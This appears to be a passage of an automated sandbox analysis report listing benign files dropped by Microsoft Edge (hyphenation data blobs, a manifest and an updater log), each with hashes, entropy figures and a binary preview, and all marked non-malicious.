                                                                                                                                                                                                                                                            Preview:hy.b.............%..o7......A........................................................................................................................................................ !"...#......................... !"...#....?.........?...............@DB.@N.#@c.*.y.2.2.:@4.C.8HK.<.T@?.\.D.d@Q.m.bMv@q...q..t...}....R.....@...........@...e.........v...q.....@.^............("...c......%...*C%@%...0E..7..A8G.A....9...9...#K....%A:M&A=.,.B.2.C.6.DJ.@F.:.F.A.A.H.S.P.T.T.T.Q@U.2.X.U.+...?.Z.\...^..a..c.2....@d...d...g#^..AbAg.gAj...mDmAh.r.d.wARG}.pH..s.....H.t...u.....bN......P..w...y..Ay..z..~..A~..~.Y......Y.N."....@Z...Q....P....Z.B.R.......A....A......U.........:.>.....H..5...u.(..K...L......N0@......\_........?S..4..@.U..=....@l..B.Y..a...*[p..\..8...9...oIB....o..C..........+.p......@..!...;.......@1H..I.@.....K...L:..M .....5..B....(...+....S..[.:.A.....|..A....A.Y.@.....g..........i..C..G..Bb...eF'..G........$..J1AW.IA.L*.MO.#.>@..1....@...@O.6B8S=.<.C.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):647
                                                                                                                                                                                                                                                            Entropy (8bit):4.1580884891492484
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:vke/qU1skFHsUbhiZmltXz4Nw2GVlHthkIU9t80dtcUe0jum08h:82qHkqEEoUIU88yMc8h
                                                                                                                                                                                                                                                            MD5:7E265A294303F69AA66C243F5F474463
                                                                                                                                                                                                                                                            SHA1:4D382AB4BED3DBE481710F0C651CA87B2394661D
                                                                                                                                                                                                                                                            SHA-256:4E9CD302BAFFC4EA3E9652327EA24072EBF37B5C4FC0719292BDAC10AAAD665B
                                                                                                                                                                                                                                                            SHA-512:D347D422249945C9A664BE3C48E1EC07BECAF03BD3525869F06C9AA328B4FE2884AC963CB97949D97E5AB41617B0FC6F2A2171F06007BF94CCE88D55A15DA922
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........$...X...........A.....X...X...X..(X..0X..8X..@X..HX..PX..XX..`X..xX...X...X...X...X...X...X...X...X...X...X...X...X...X...X...Y...Y...Y...Y.. Y. (Y.!0Y."8Y.#@Y.$PY.%XY.&`Y.'hY.(pY.)xY.*.Y.+.Y.,.Y.-.Y...Y./.Y.0.Y.1.Y.2.Y.3.Y.4.Z.5.Z.6.Z.7.Z.88Z.9@Z.:XZ.;`Z.<hZ.=.Z.>.[.?.[.@`..Ah...............?......G............A...........A..............................................................................................................................................................................................................................=...........@...................................(......................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):607
                                                                                                                                                                                                                                                            Entropy (8bit):4.0169087789595075
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:MV9cE9PvVFvf1EEPHflMijlt7zvnG43fcN8Udtcct8U9t80dtcU/8Ub8h:MsENVdt/tNXX3fU80ccSU88ynu8h
                                                                                                                                                                                                                                                            MD5:0F27E5BCCC1CD9DDF3EAC020DA27DA57
                                                                                                                                                                                                                                                            SHA1:BD3C83300AAD3E79287C1E806E864F7644240911
                                                                                                                                                                                                                                                            SHA-256:470329D28FAA484F945D78FFEFB176DCB6F2032C753E25BC014106AD24B2C68A
                                                                                                                                                                                                                                                            SHA-512:141DA09A4A1A3B9E581751A1B2C70CBE981E1A915EA538A8015C7614D11BE059CD3A03B4F2420F963E5657A4417B3CC5C3A22E0028132A21363219E27751CCFB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............0..._.......<.....P...P...P..(P..0P..8P..@P..HP..PP..xP...P...P...P...P...P...P...P...P...P...P...P...P...P...P...Q...Q...Q...Q.. Q..(Q..0Q. 8Q.!@Q."PQ.#XQ.$`Q.%hQ.&pQ.'xQ.(.Q.).Q.*.Q.+.Q.,.Q.-.Q...Q./.Q.0.Q.1.R.2.R.3.R.48R.5@R.6XR.7`R.8hR.9.S.:.S.;`..<h......?...............B.......A...B...C`...@... ..........................................................................................................................................................................................................x...y...z...;...|...............................(......................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1414
                                                                                                                                                                                                                                                            Entropy (8bit):2.57311219135147
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:TF+k+Mo1Mo1gL82mvD2VE+hJBBSZ6s8ADrsh:RlNo1Mo1lx7+hJy8sdQh
                                                                                                                                                                                                                                                            MD5:564FF32DED64C6BFC693F2758A53D68E
                                                                                                                                                                                                                                                            SHA1:3965F963D36BEE1598683E72C857A3BFF196B295
                                                                                                                                                                                                                                                            SHA-256:F6FBF1BCB260CC86256FC494F388F7B27D10865FBF8F61517DEE25AF4D58D6E8
                                                                                                                                                                                                                                                            SHA-512:E9E574BA07703295AA8B7FD4603EF079816EA44394BD62750E08E523B9A7B408FD979552D90D04F825242CCADA7AD66003FBA76C9C8469541B5C6D2FB85C41E8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............L...........-.................................................................................................................................................................... ..!....."#$....%............... ..!....."#$....%......?.......................A.......C.......E.......G2......B...J....:..L2.......:..........Q2.......!...*..U2......W2.......:...:...............:...............#..........................................G...........X...........B.......F....................... ...!...".......$...%...........B...............F...............J.......................P...V....................................... ...!...".......$...%................................................................................................................................................... ...!...".......$...%...........B...............F...............J.......................P........................................... ...!...".......$...%...........................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):19886
                                                                                                                                                                                                                                                            Entropy (8bit):5.101274087578558
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:hRsmaIUzHCX1GgFJwKSw4foB7zM1xnXg3JIcDn4VOzfr7K8lxf4:hR8IUzIRQw4foPM1xn6lDn1TFA
                                                                                                                                                                                                                                                            MD5:4D132AB42E0C8ABD3BA93D8B34BDBEB3
                                                                                                                                                                                                                                                            SHA1:F3CE82F2DBDEAD517D5FAA4490E1975EF8FAFA6E
                                                                                                                                                                                                                                                            SHA-256:336CE2048FFD31B7BCAF435E53BADFAF0579E405042D49ADBC0823F6BE5F9614
                                                                                                                                                                                                                                                            SHA-512:EB8E27AB070DB7407F1EDE29751AAB4A88F4182E878E956CC51D0ED9EF2C9AFDEC208F2F4700551374C5A7F69C176ED7D6CB771AC17C3EAE77323A5709A85FCC
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............,K...M......v..."...#...$...% ..&(..'0..(8..)@..*H..+P..,X..-`...h../p..0x..1...2...3...4...5...6...7...8...9...:...;..."...#...$...% ..&(..'0..(8..)@..*H..+P..,X..-`...h../p..0x..1...2...3...4...5...6...7...8...9...:...;..... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...!...!...!...!.. !..(!..0!..8!..@!..H!..P!..X!..`!..h!. p!.!x!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!..."..."..."...".. "..("..0"..8"..@"..H"..P"..X"..`"..h". p".!x"...".....?...............G...@.....0......! ..).../H.F7P...\..?...E...M..KS...Y..._...g..Oo...w`..~....p.....T.................Y..... .['...<....p....._...............B)...x...0...(.......A...............(...@.....N.........`.Q...RKx.......8.U.......+.......Bh..4..Q.....8.....F...........]....X...(.C.........i...x.P...H.a.I....C................... ...;.......&Y.S,...1y...i..6...uc..u.......7.......!0.T.(.F.....8.....!.....@.....Cf....... ...V..P........H..1..S.......M<....P.. ...@..F....~..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):64103
                                                                                                                                                                                                                                                            Entropy (8bit):5.820830603564126
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:tIAzVJ7EgiDEY0ZcznEDEo5JWJ4pgY5AW/N+:dhJRiDEfMaEw24auAv
                                                                                                                                                                                                                                                            MD5:CEA295E8B4B99F95738727905A9184E2
                                                                                                                                                                                                                                                            SHA1:31DB6C826FD7830BC76F0AC1B9D21C2EF67F8B1F
                                                                                                                                                                                                                                                            SHA-256:138C5990961DA21993653F54A413DDACB8921D6D70B892B7CA154D6E8AD2028C
                                                                                                                                                                                                                                                            SHA-512:B20F651C74A070A4D26B58BD8462E553077B7333A2C854F7974A7E67BC442C3A6FEBA52C3A537FD9F1579D5DE0126BBE1DA4BE99AABEE79B7987B2EDFDD8ED67
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............H...g.......i....8...h............... ...(...0...8...@...H...P...X...`...h...p...x..................!...#...&...'...(...)...+................ ...(...0...8...@...H...P...X...`...h...p...x..................!...#...&...'...(...)...+.......- ../@...H...P..0X...h..1p..2x......4...3...$...5...6...*.......- ../@...H...P..0X...h..1p..2x......4...3...$...5...6...*....`...h...p...x...........8...@.......... ... ..." .."(..%p..%x..,...,...........?...............[=........p...p.C.....P..*...$...-.......2.......;.......$...G...Q...W...` .Q~..S....l...up........%..Y...Yv1.......`.............]...!.`..5....p..z..#F..fd..'.....p.i..]d...D...B..m.0.n.`... .0.......r P.3.......5...6..............g...;....p.U...K....*..!.i........P$...<...R.....T.P.....V.........B......M..[.........q..'#...A...i..........+..]q......f]@.....h...i.....`..........m..T.0..-........@.U\..............G.....".I"Q.........!.0..m2..'...-......QT....t......1!..7..V=...?......Y.....`..C!._....H......_Nq.....
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):6631
                                                                                                                                                                                                                                                            Entropy (8bit):4.666183419763895
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:LbHqR1cAky2TFP+HQ1QpHPZtCjUtKapFxx8mLJO/5n0PatE08YyM9eW3svUaf5lk:P21cPFPAHPGjpEr85/NVtEjoeW88af5m
                                                                                                                                                                                                                                                            MD5:A21358DD4506643486F72F7D80D60A5B
                                                                                                                                                                                                                                                            SHA1:FB7EE02ADC970F4D71C84D18777A59508FA1A46C
                                                                                                                                                                                                                                                            SHA-256:AD746C68562603AC3B15E89DA03C76E081C08E7D9C8D4C9F64763E53D696C77C
                                                                                                                                                                                                                                                            SHA-512:7DC9E18050B3DF4288AACAAFFDB17668F0B5D8B5E103305070D2EF83DAB2F5DBE3B071B05CA69340D86A53D47D4CF8197ECC1BDD086A320BF81F9DF8C0D3CCB8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........d...............A...................................................................................................................................................................................................................................................................................................................................................................A.D...#.....d.)...E...&.g.........7.*.... ..l#8..&...*?./....1@.Q....5...8..T;2..>...B..w...X....C...E...H...J..}K................+.....c...A.,..x/.....iw1.H :......y-..P!.....0...n.$...<...0..yC.....V...t....| ...%.:.'.;...<.*.=.....4.".....5..0..e...F.....9.....I6...L........".....n7(.....0....}=..N..........U!....>.g.3.3}.......O..........]`...F..%{..c...d...E....z..................k...L'......n...o)..........RL..s...t.......v....z..............{...|.......b...c........$......g...h....1..j...k...lJ..M....R...M..p...|}...4..s...................}...t.......{...|........(.......R..%....:...................+..
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2013
                                                                                                                                                                                                                                                            Entropy (8bit):4.405419184822226
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:Q2nTjgiQesp28MNwcPsBPAKeJjlg6uO8FmdR+w1NdpbYBUYxqt68b40DBz/mUfpg:VHErckB4Z6O8F691r6Bdnl0Nz/f7+
                                                                                                                                                                                                                                                            MD5:A22D0F39CD83F3A8E251F95C5B12DD31
                                                                                                                                                                                                                                                            SHA1:24915151B31525A0A9EA0EF7FAF8DDB8B3FAF11E
                                                                                                                                                                                                                                                            SHA-256:BC29C9401CE952414CBAEBC5C8EE1D27C1706C6F77807B5FF713E2124438B3CA
                                                                                                                                                                                                                                                            SHA-512:AD319FC85AA612BEDAD8289A20FCF42D4336C4B3ED704CE74C6C0ED68E3E18D62C18549F8A5EFE5BD481D8DEF514F2C6B083803485E04BD5919BC600501C0E00
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........................8....8............... ...(...0...8...@...H...P...X...`...h...p...x....................................................... ...(...0...8...@...H...P...X...`...h...p...x...........................................8...X...8...X...................?......v...`...!@.."@..............&.......H.......*........J.........o...PP......2....E..4...uV..VY......X.......:.......\@..]........@.......................@......................................4...............x...0...............]...........................+................ ................../................&......w...........0...n...................6....................................................................C..m...,........L...........!...(...............@...A..........L(..........................K.......................................6............C......$........C......."...C...............C...................b..L$...$.......(......lb......7........C..z............C..4...........L'..n............g......
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):72119
                                                                                                                                                                                                                                                            Entropy (8bit):6.043656444032453
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:KC2kHtGIlaNlgMMjmhkFQ0+9FRGv8L38CNf7k2k1rJ:KCDcIlt5mhweMEX42k1l
                                                                                                                                                                                                                                                            MD5:892598DC59CE71E68ED337ED9FF3ABC1
                                                                                                                                                                                                                                                            SHA1:C89AF0D28B8B769150981539EC2318E34DF29CCE
                                                                                                                                                                                                                                                            SHA-256:56642AA5A37625FF9D034761D16B034D4BA5BE74090CBD825956BBCE2775ECD1
                                                                                                                                                                                                                                                            SHA-512:EB13A68FF5CDD0EDD73CE4C109984B3E58763812C31755BD55C0A324048873F610E36D1C41B3F642A64F7FE0945EE872A02FDE744D5821AAB03A2288851D984D
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............D...........A.................................................................................................................................................................. ............................... ....?...............SA.........2...... GD'..E/.WF7.OG?.\.G.5.O ^.W``._...g...o ..w.... .......`... #..@$...%...&..@'..'. )..@...`+..`... -.. .^.........`1B..1..`2..@3..`3.. 4..........@6...7..!.L.A...A9..`:O..:..!<.......<S..=.".>U&.6V+.>..@?..`?.+.?...:....\.@8...(R.`..0!A@....3.CB6.D. ...:!.E......F.?.F..`G..H.2...B...I!I.P.K.V.KO..*.[.!.. L.b!..j.L.qa .u.#Vz.MW..N.#.NY..9.......O.r.:S..;..&P.{@P@. ...aP...R.C@Q..`T.a.FI..G:.T.r@....TE.AU.r`UL#..M..%.r.U...<..`V..#W...:SO.T...TU.aD.. (.r.X...#.1.X..a.[g.Y.E..].`.A*"Y_.@Y@.......EY.-..@.. .YE..O.A.... Z..Z...[..[K..[O/B\..`\...\..A...C....\.M.\. B.).]..]...^..`...C^...ZZ.`^L.C....^...^@......_.8@.C*._..=..a-.# `.Z`....I....8!...@..Q`... ..r....a..&.........S.!.TF ...!.VI........@....Z.L... .b. .6. .. !
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):554
                                                                                                                                                                                                                                                            Entropy (8bit):4.097315344818262
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:qOkVbj778oso/8kbX7MTADiZM3kTxPUKtcUUymPr:qdVv77yo/8AX7MTHLGKynyOr
                                                                                                                                                                                                                                                            MD5:AB2F6F9696FC7D699356244725E7C778
                                                                                                                                                                                                                                                            SHA1:2026841DA77DD77715B521EC73BF819D1D098B60
                                                                                                                                                                                                                                                            SHA-256:40FDA94856A86F065DE8BAA6184EA63DCDB011EE4CA498A7C1FEE44C99314C67
                                                                                                                                                                                                                                                            SHA-512:88A4C2117102BDB60D482448C36DD79A8DA1130A4636513C8ED56EB282DA6C638D27EABC9799EAB8BC1A7234A0AA6690C55408500608387912FE283F13BCC328
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b................*.......3.....\...\..(\..0\..8\..@\..H\..P\..p\..x\...\...\...\...\...\...\...\...\...\...\...].. ]..@]..H]..P]..p]..x]...]...]...]...]. .].!.].".].#.].$.].%.].&.].'.^.(.^.).^.*0^.+8^.,@^.-P^..X^./`^.0h^.1.^.2`..3h......?...............<........@...0...a.......A...!.......Q..........................O...P...Q...R...S...T...U...V...W.......Y...Z...[...\...]...^..._...`...a...b...c...d...............................................................0...0...................................,.............................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):703
                                                                                                                                                                                                                                                            Entropy (8bit):4.223695084085508
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:A1l1ltFUcfE8Uceyqw2ttN6rOODQlESkP9t80dtcU9tFj0osZE8h:A1icE8UcZPH88yUFIbZE8h
                                                                                                                                                                                                                                                            MD5:BF9DF63B3C97DE3BFF99E24EE4BC5F2E
                                                                                                                                                                                                                                                            SHA1:774659CF1D58BCFC69900315281E99E038CD2A97
                                                                                                                                                                                                                                                            SHA-256:516FA9654FA3AEAAB480D40EAF6AD78FC039086BD8EDC144BE3D59525EDCAC29
                                                                                                                                                                                                                                                            SHA-512:52F40A2C38CC62AA6B0E081C90B9DFCD6D3ED03A4A90E596E11AC85BFDA96EAA74D465CD7168B803C0D59A53DF878B0EA1CA657C5CAF3DE49C8758CBD527BEE2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........@...............H.....`...`...`..(`..0`..8`..@`..H`..P`..X`..``..p`..x`...`...`...`...`...`...`...`...`...`...`...`...`...`...`...`...a...a...a. .a.! a."(a.#0a.$8a.%@a.&Pa.'Xa.(`a.)ha.*pa.+xa.,.a.-.a...a./.a.0.a.1.a.2.a.3.a.4.a.5.a.6.a.7.b.8.b.9.b.:.b.; b.<0b.=8b.>@b.?Pb.@Xb.A`b.Bhb.C.b.D.b.E.c.F.c.G`..Hh...............?......N............A...........A......................................................................................................................................................................................................................................................C...D...........G...................................(......................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2712
                                                                                                                                                                                                                                                            Entropy (8bit):2.634842338757876
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:pOWZMS0jrjvFgj3PgjY8jKHjgj5D+SlRAd5+UjbxgjUKdHyM:l0fzODok8+jg9D+eRA6UnxgTdHyM
                                                                                                                                                                                                                                                            MD5:ED60185B6F455B6F8ED27EAEB73334A9
                                                                                                                                                                                                                                                            SHA1:11E53BDA5E2A0ACD000692AD8AF45611B57277AD
                                                                                                                                                                                                                                                            SHA-256:77FDAED29BD842AAA976AB7EF81B617A15C0A2D1EBD1161C1BF26B79A108B5CD
                                                                                                                                                                                                                                                            SHA-512:3EF211A330EFE9E34468C9C460DFCDA1B8DA80D113317A177205C76FFCB916FF25FFCB4485703FD01EE248D356A67E5BB18DF8E5EA40B2AAB3999121083B7E30
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........x...d...........-...............................................................................................................................................................................................................................................................................................................................................................................5.......!...b....2...2..E$.....G....2..I$...2..K........2......o....2..1........2..t........ ...2..X$...2...'...+..</...2......2..c...d6......f6..g6..h6......j6..k6..l6..m6..n6.....p6..q6..r6..s6......u6......w6......y6..........|6..}6..~6...6..C...D.......F...G...H.......J...K...L...M...N.......P...Q...R....B......U.......W.......Y...........\...]...^..._...C...D.......F...G...H.......J....B..L....B..N........B..Q........B......U.......W.......Y...........\...]...^..._...C...D.......F.......H.......J...K...L...M...N.......P...Q....B...B......U.......W.......Y...........\...]...^..._...C...D...
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):19417
                                                                                                                                                                                                                                                            Entropy (8bit):5.328804005178715
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:+uuckg5iXANOMyv3qTtbfRhn8da+dzk29L5zA:1FviXA4MuofRhn81zk291A
                                                                                                                                                                                                                                                            MD5:0EC028755F0CD9EBBA41FB7273DE8BAF
                                                                                                                                                                                                                                                            SHA1:A8A784454269A2769710FB3725730F06CDD7B242
                                                                                                                                                                                                                                                            SHA-256:1C626ABE40D43F6D56A01B5B40305D7C7D6481F616EAC00A3F3AAAACA8388786
                                                                                                                                                                                                                                                            SHA-512:024C611EBABB0A84B5A887D808E24884CCBB4550F222E651728451CDDB9A941D7D9A39786DDFE4A57D049DC82780C6BCF376D3E98547ECC4808FC7ED32ED47A9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b........4...pI...K......E....8...h..! ."0 .#8 ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ...!...!...!...!.. !..(!..0!..8!..@!..H!..`!..p!. x!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!...!..."..."..."...".. "..("..0"..8"..@"..H"..`"..p". x".!.".".".#.".$.$.$.$.........?.........................x...p..#...,h..5x..>H..G(..P...Y0..b...k...t...}P...........0........@...8....................................1..(1..1a..:...C)..L..........K?.......U...X.......^....X.....Kc.......VI..e..Ob...h...n...W...oq..l9..qA..rY..\...g..Y^)..^...`...y....(... ...H...P...............h..........9....Q.......I.......i...a...9...................Q...........9...Y...A...........q...y...a...........!...i...y...........i......{i...........................y...!...q...........A..........................................................................................{.........................................................y...................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):3484
                                                                                                                                                                                                                                                            Entropy (8bit):5.253138005413701
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:KEn0vz7f+IXVNBMWXma7WWDrOEKYa3FZxU6b7JXkB5/Xh5f3B5PBhPPhhvPK0OEl:Fy5VNB9XrbDHKYKZHpEx5fxhPf7O0V
                                                                                                                                                                                                                                                            MD5:4AA9B2C0C9CCDE5140D01DC6502242BB
                                                                                                                                                                                                                                                            SHA1:D1759E8A62A42A72529ADF9BC73820BF32F2A37B
                                                                                                                                                                                                                                                            SHA-256:1DE83CB787DFAF53FB7E6E8DB3AAE5008AD24EBDD28BE02031306EA9E9F3E285
                                                                                                                                                                                                                                                            SHA-512:1B456301D814810E857E8A0C426E703A802FEBB5C3DFD8D0E5C58AEEFC6C2D6F55C95830024C243D2BFBB8322EF72E9FF959CDC7F92AE51BEBE8B053D9CDA1E5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:hy.b............|................................ ...(...0...8...@...H...P...X...`...h...p...x......................................................... ...!..."...#...$...% ..&(..'0..(8..)@..*H..+P..,X..-`...h../p..0x..1...2...3...4...5...6...7...8...9...:..;..<..=...>..?..@...A...B...C...D...E ..F(..G0..H8..I@..JP..KX..L`..Mh..N...O...P...Q...R...S...T...U...V..W..X...Y..Z...[...\...]...^ .._(..`0..a8..b@..cH..dP..eX..f`..gh..hp..ix..j...k...l...m...n...o...p...q...r...s..t..u..v...w..x..y...z...{...|...}...~ ...(...0...8...@...P...X...`...h.............................................................................. ...(...0...8...@...H...P...X...`...h...p...x.......................................................... ...(...@...H...P...X...`...h...p...x..................................................................... ...(...0...8...@...H...P...X...`...h...p...x................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):66
                                                                                                                                                                                                                                                            Entropy (8bit):3.8435095592647968
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:SVXj4nxIGXjkXXjcLUTkrXRH:SV8nLeXgGwR
                                                                                                                                                                                                                                                            MD5:1D09A9A5E62B846125CD7B929CCCBE44
                                                                                                                                                                                                                                                            SHA1:5271237C4D13F7735689A5ACC52E48C491669AA3
                                                                                                                                                                                                                                                            SHA-256:1703E4E777B285ABA435E71256890A5FE92D24CB01E0EEFD03BADDCA228EEE2F
                                                                                                                                                                                                                                                            SHA-512:CD2A2ACC126AC6A7DCC81088047C894A427A44C5CAA96003C1F3521BEAC3B46C117F0794E564838DE14A18A3F65CB7988BA86B404E690EC77A57518247C03FBB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:1.00AF3F07B5ABB71F6D30337E1EEF62FA280F06EF19485C0CF6B72171F92CCC0A
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):82
                                                                                                                                                                                                                                                            Entropy (8bit):4.518013103500336
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:rR6TAulhFphifFbykJvFgS1Q+LVHA:F6VlMhyk0S1bhg
                                                                                                                                                                                                                                                            MD5:2617C38BED67A4190FC499142B6F2867
                                                                                                                                                                                                                                                            SHA1:A37F0251CD6BE0A6983D9A04193B773F86D31DA1
                                                                                                                                                                                                                                                            SHA-256:D571EF33B0E707571F10BB37B99A607D6F43AFE33F53D15B4395B16EF3FDA665
                                                                                                                                                                                                                                                            SHA-512:B08053050692765F172142BAD7AFBCD038235275C923F3CD089D556251482B1081E53C4AD7367A1FB11CA927F2AD183DC63D31CCFBF85B0160CF76A31343A6D0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{. "manifest_version": 2,. "name": "hyphens-data",. "version": "120.0.6050.0".}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                            Entropy (8bit):5.415468926333216
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Y4MfJVe5wMd5wMe07cIF5Io0MY5kU2A0OpJ5xnL0MotJ5VovUx0yi5DQ5DC0h:JIVuwEw5MUFZLBQLts8t
                                                                                                                                                                                                                                                            MD5:8AC05669C93CD02C308EC2C6B4AB219F
                                                                                                                                                                                                                                                            SHA1:932FDA6BE1D2E5C28139E875B692109FA98D45CC
                                                                                                                                                                                                                                                            SHA-256:94CED29F9BC3B592659D5E492A7C4619DC5E4F8CDCF79EEBA6B1979A4E57FF83
                                                                                                                                                                                                                                                            SHA-512:C7583FADF9C6DA739BF2A2BA01054628BD6B933FB609D44F18A295D456861121F3A4584B1B5CD7C71B32DD655AA235C344BB394096A69D469AEA8691426E0C92
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"logTime": "1005/061810", "correlationVector":"0kV+/vRB8ay0a3Cue7mk6o","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"AFo3IfjRT+3l4ojiXpMdNH","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/061810", "correlationVector":"838E3BF9A44F456CB4AD62AC737EDD15","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063233", "correlationVector":"2N8fwTcZh6EtTfQ8o4+6aX","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063233", "correlationVector":"5ADEBA42608E4CC9A1FACA719F284CF9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/063346", "correlationVector":"xp/hBMCdVPtUIxZHIviv/x","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/063347", "correlationVector":"BF0B9E58C0CC45ED9AB5D0371131E69A","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/064305", "correlationVector":"ONVjsWDap1LyjIRdxsqPGs","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/064305", "correlationVector":"82E52491
